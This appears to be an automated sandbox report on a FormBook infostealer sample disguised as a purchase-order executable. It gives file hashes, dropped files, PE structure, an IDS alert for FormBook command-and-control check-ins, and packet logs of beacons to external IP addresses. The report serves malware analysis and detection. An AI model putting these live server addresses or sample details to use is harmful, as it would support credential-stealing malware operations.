• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: PO 1202495088.exe
Time: 15:54:13
Type: API Interceptor
Description: 28814013x Sleep call for process: cttune.exe modified
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7df799b3, page size 16384, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1048576
                                                                                        Entropy (8bit):0.8697691602923368
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:bSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:bapaQK0yfOD8F31Xw
                                                                                        MD5:169093BEA5E6E5398C17248EC26A95C4
                                                                                        SHA1:B43581925A70A3C807CA48CF2014C1029E5A94A3
                                                                                        SHA-256:7A3E7747725223B1DCA53D85F11F6C3E8260E1ED4312FAAC04F5DC612854A107
                                                                                        SHA-512:4FF4DE323F861011DD706180B4726290A62CA33CDF75252A446961C6975CBF7104902450829D130BC92E5D025D760A0B6A9F38B3B4AACF7F7F7F24A186B13903
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Process:C:\Users\user\Desktop\PO 1202495088.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1378
                                                                                        Entropy (8bit):5.375486659408667
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4K1Bj1qE4DL0E4KOKDE4KhKMaKhPKIE4oKnKoZAE4KzDa84j:MxHK1Bj1qHDL0HKOYHKh6oPtHoAhAHKS
                                                                                        MD5:73ED63431E9850D6F7BDF5E5620A055E
                                                                                        SHA1:BED1E7FE48E4BB9BFC1542090849489131D62D9C
                                                                                        SHA-256:A8BE50B0D96B60E51216C0249C38523D0AF8BD2D81DEB45CC75FA87AF3500669
                                                                                        SHA-512:8552DA1F4E1989AAE29AB323355445EC693B5AE7F315A14705A4C7688AD164B6581FE4F74C754FA75417F056C56846AEF91F82A662C0723614B05501768DF1F2
                                                                                        Malicious:true
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\9071a2976b2ef0ee49d0396431277b05\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\ca77152be4cd7af9700becb268864b42\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\S
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\cttune.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):135168
                                                                                        Entropy (8bit):1.1142956103012707
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                        MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                        SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                        SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                        SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.711488026281398
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:PO 1202495088.exe
                                                                                        File size:863'232 bytes
                                                                                        MD5:49095d080a201256f23914317e65ef4b
                                                                                        SHA1:6e5d17981778ab6e6929b486d1db0ee538ba4f10
                                                                                        SHA256:168f3f67fdf19ef0a0afabb378ee803fb3cf1f822ad37ba51772bc96a58a83d0
                                                                                        SHA512:db37966eefd9311cd0bab2e502b74de80c887db718e2d21b8248a0251f8629b103877606eaa6f7bcbb5412003edb63d0a47ef28f93300b47f78a2de786369e28
                                                                                        SSDEEP:24576:IjlIhSPd+pJH8Fa6LS1pxRW1j1/4bV0tktl8:Ijl+SPspiaVpxR01Ack
                                                                                        TLSH:3005C0C03B2AB701CE6CB934853AEDBC62642E747004B9E3AEDD3B57769D1126A1CF54
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.Zg..............0......$.......$... ...@....@.. ....................................@................................
                                                                                        Icon Hash:37c38329a3924d33
                                                                                        Entrypoint:0x4d24ea
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x675A8F56 [Thu Dec 12 07:23:02 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd2498 | 0x4f | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x21e0 | .rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd8000 | 0xc | .reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                        .text | 0x2000 | 0xd04f0 | 0xd0600 | 1d9bf94a217d159d4fb4c999cf97ff5e | False | 0.8905617314037193 | data | 7.712943967967854 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc | 0xd4000 | 0x21e0 | 0x2200 | d74364a92dd620c8969fab5357111417 | False | 0.9308363970588235 | data | 7.620304073873119 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc | 0xd8000 | 0xc | 0x200 | 6926706c5014ad1cf039c590f2105abc | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                        RT_ICON | 0xd40c8 | 0x1e1f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9939048113085203
                                                                                        RT_GROUP_ICON | 0xd5ef8 | 0x14 | data | | | 1.05
                                                                                        RT_VERSION | 0xd5f1c | 0x2c0 | data | | | 0.4602272727272727
                                                                                        DLL | Import
                                                                                        mscoree.dll | _CorExeMain
                                                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                        2024-12-12T21:54:58.180357+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.11.20 | 49728 | 103.106.67.112 | 80 | TCP
                                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Dec 12, 2024 21:54:25.565715075 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.570578098 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.791971922 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.800872087 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.800926924 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.800971985 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.801156044 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.801253080 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.801306963 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.801403999 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.801609039 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.801609993 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.802946091 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:26.029354095 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:30.945960045 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:31.059473991 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.059741020 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:31.063124895 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:31.176817894 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.194598913 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.194617033 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.194629908 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.194823980 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:31.198626041 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.198892117 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:32.572035074 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:33.585777044 CET4972180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:33.716805935 CET8049721199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:33.717170954 CET4972180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:33.720623970 CET4972180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:33.852026939 CET8049721199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:33.852073908 CET8049721199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:33.852107048 CET8049721199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:33.852339029 CET4972180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:35.225780010 CET4972180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.242455006 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.356415033 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.356578112 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.363010883 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.363084078 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.476893902 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.476969004 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.476998091 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.477394104 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.477435112 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.477462053 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.477489948 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.494647026 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.494718075 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.494751930 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.495194912 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.499610901 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.499948978 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:37.865216017 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:38.882533073 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:38.996381998 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:38.996668100 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:38.999013901 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:39.112667084 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.130281925 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.130295038 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.130302906 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.130650043 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:39.131963968 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:39.135644913 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.135904074 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:39.245718002 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.297552109 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:44.411784887 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.411957026 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:44.415591955 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:44.529457092 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.703825951 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.703843117 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.703854084 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.704654932 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.704864025 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:44.705254078 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:45.925991058 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:46.942150116 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:47.056186914 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.056376934 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:47.060172081 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:47.174042940 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.372967005 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.372980118 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.372992039 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.373158932 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:47.373963118 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.374098063 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:48.566531897 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.582984924 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.697102070 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:49.697263956 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.703917980 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.704006910 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.818101883 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:49.818141937 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:49.818418980 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:49.818460941 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.001415014 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.001422882 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.001427889 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.001619101 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:50.002629995 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.002789021 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:51.206720114 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.223444939 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.337891102 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.338110924 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.340471029 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.454410076 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635255098 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635380983 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635396004 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635617018 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635648012 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.635792017 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.636897087 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.750821114 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:57.855012894 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:54:58.015391111 CET8049728103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:54:58.015573978 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:54:58.019175053 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:54:58.179395914 CET8049728103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:54:58.180129051 CET8049728103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:54:58.180139065 CET8049728103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:54:58.180356979 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:54:59.532800913 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:00.549632072 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:00.708262920 CET8049729103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:00.708487034 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:00.712104082 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:00.870713949 CET8049729103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:00.871450901 CET8049729103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:00.871572971 CET8049729103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:00.871706963 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:02.219487906 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.235625982 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.395343065 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.395565987 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.399182081 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.399267912 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.559007883 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.559618950 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.559663057 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.559695005 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.559839010 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:04.906615019 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:05.922502041 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.082986116 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:06.083199024 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.087656975 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.247978926 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:06.248677969 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:06.248703957 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:06.249039888 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.250485897 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.410865068 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.411772966 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:11.543206930 CET8049732199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.543448925 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:11.547008991 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:11.677968979 CET8049732199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.677985907 CET8049732199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.678143024 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:11.678212881 CET8049732199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.678404093 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:13.060904026 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:14.078252077 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:14.191973925 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.192174911 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:14.195770979 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:14.309632063 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.327230930 CET8049733199.59.243.227192.168.11.20
